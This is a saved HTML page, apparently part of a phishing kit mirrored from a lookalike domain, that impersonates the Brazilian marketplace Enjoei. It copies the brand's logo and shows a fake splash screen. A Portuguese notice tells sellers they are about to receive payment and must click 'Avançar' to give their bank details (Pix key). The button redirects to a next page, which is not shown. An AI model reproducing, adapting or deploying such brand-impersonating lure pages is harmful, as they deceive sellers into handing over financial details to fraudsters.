<!DOCTYPE html>
<!-- saved from url=(0075)./?enjoei_page=very&ssid=d41d8cd98f00b204e9800998ecf8427e -->
<html lang="en">
<!-- Mirrored from vendas.enjoei-24horas.shop/very/?ssid=fc3bd197e5c343c07beca00b8dd01ccc by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 27 Nov 2024 21:44:38 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ENJOEI  - Very</title>
</head>
<body cz-shortcut-listen="true">
    






    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Enjoei - Mensagem</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f9f9f9;
        }
        
        .top-banner {
            background-color: #EDE3F9;
            text-align: center;
            padding: 10px;
            font-size: 16px;
        }
        
        .top-banner p {
            margin: 0;
            font-size: 14px;
        }
        
        nav {
            display: flex;
            justify-content: space-between;
            align-items: center;
            background-color: white;
            padding: 10px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            position: relative;
        }
        
        .menu-icon {
            font-size: 24px;
            background: none;
            border: none;
            cursor: pointer;
        }
        
        .logo {
            position: absolute;
            left: 50%;
            transform: translateX(-50%);
        }
        
        .logo svg {
            height: 40px;
            width: 40px;
        }
        
        .nav-links {
            display: flex;
            align-items: center;
        }
        
        .nav-links a {
            margin: 0 10px;
            text-decoration: none;
            color: black;
        }
        
        .search-bar {
            display: flex;
            justify-content: center;
            padding: 20px;
        }
        
        .search-bar input {
            width: 90%;
            max-width: 600px;
            padding: 10px;
            border-radius: 5px;
            border: 1px solid #ccc;
        }
        
        .promo-banner {
            background-color: #FFC0CB;
            color: black;
            text-align: left;
            padding: 20px;
            margin: 20px auto;
            border-radius: 15px;
            font-size: 18px;
            max-width: 90%;
        }
        
        .promo-banner h2 {
            color: #FF1493;
            margin: 0 0 10px;
        }
        
        .promo-banner p {
            margin: 5px 0;
        }
        
        .create-account {
            text-align: center;
            padding: 20px;
        }
        
        .create-account h2 {
            font-size: 24px;
            margin: 10px 0;
        }
        
        .create-account p {
            font-size: 18px;
            margin: 5px 0;
        }
        
        .create-account button {
            background-color: #800080;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            margin: 10px 0;
        }
        
        .create-account .terms {
            font-size: 14px;
        }
        
        .create-account .terms a {
            color: #800080;
            text-decoration: none;
        }
        
        footer {
            text-align: center;
            padding: 10px;
            background-color: white;
            box-shadow: 0 -2px 5px rgba(0, 0, 0, 0.1);
        }
        
        @media (min-width: 768px) {
            .nav-links {
                flex: 1;
                justify-content: flex-end;
            }
        }
    </style>



    <header>
    <script>
            setTimeout( () =>{
                document.querySelector('.logo-banner').remove()
            },1500)
        </script>
        <style>
            .logo-banner svg{
                animation: bounce .8s ease infinite;

            }
            @keyframes bounce {
                0%{
                    opacity: 0;
                }
                50%{
                    opacity: .5;
                }
                100%{
                    opacity: 1;
                }
            }
        </style>
        <div class="logo-banner" style="position: absolute; inset: 0; background: #fff; left: 0; top: 0%; z-index: 999; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center">
            <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="none"><path fill="#61005D" fill-rule="evenodd" d="M1.25 14.19C1.25 5.845 6.813-.005 15.002-.005s13.752 5.85 13.741 14.193c0 .96-.033 1.943-.143 2.749H1.393c-.11-.806-.143-1.8-.143-2.749m20.485-2.197c-.343-4.348-3.135-6.147-6.733-6.147s-6.39 1.799-6.733 6.147zM8.093 20.37c1.644 2.45 3.874 3.763 6.909 3.763s5.265-1.313 6.91-3.763l5.198 3.002c-2.561 5.088-7.428 6.622-12.108 6.622S5.455 28.46 2.894 23.372z" clip-rule="evenodd"></path></svg>
        </div>
        <div class="top-banner">
            Freguesia quer casacos 👀
            <p>pois bote pra vender</p>
        </div>
        <nav>
            <button class="menu-icon">☰</button>
            <p>.</p>

            <div class="logo">
                <a href="#" aria-label="ir para a página inicial">
                    <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="none">
                        <path fill="#61005D" fill-rule="evenodd" d="M1.25 14.19C1.25 5.845 6.813-.005 15.002-.005s13.752 5.85 13.741 14.193c0 .96-.033 1.943-.143 2.749H1.393c-.11-.806-.143-1.8-.143-2.749m20.485-2.197c-.343-4.348-3.135-6.147-6.733-6.147s-6.39 1.799-6.733 6.147zM8.093 20.37c1.644 2.45 3.874 3.763 6.909 3.763s5.265-1.313 6.91-3.763l5.198 3.002c-2.561 5.088-7.428 6.622-12.108 6.622S5.455 28.46 2.894 23.372z" clip-rule="evenodd"></path>
                    </svg>
                </a>
            </div>
            <div class="nav-links">
                
                <a href="#">ajuda</a>
            </div>
        </nav>
    </header>
    <main>
        <div class="search-bar">
            <input type="text" placeholder="busque &quot;richards&quot;">
        </div>
        <div class="promo-banner">
            <h2>Aviso</h2>
            <p>Parabéns! Falta pouco para receber os valores de suas vendas. Clique em "Avançar" para fornecer suas informações bancárias (Chave Pix ) e garantir o recebimento do valor de sua venda de forma rápida e segura. Aproveite seus ganhos e continue vendendo com
                sucesso!
            </p>
        </div>
        <div class="create-account">
            <button onclick="next()">Avançar</button>
            <p class="terms">Ao criar uma conta, você está de acordo com os <a href="#">termos de serviço</a> e a <a href="#">política de privacidade</a> do enjoei.</p>
        </div>
    </main>
    <footer>
        <p>Grito da moda</p>
    </footer>
    <script>
        function next() {
            // Define o caminho para o redirecionamento
            window.location.href = "./04/index.html";
        }
    </script>
    




</body>
<!-- Mirrored from vendas.enjoei-24horas.shop/very/?ssid=fc3bd197e5c343c07beca00b8dd01ccc by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 27 Nov 2024 21:44:38 GMT -->
</html>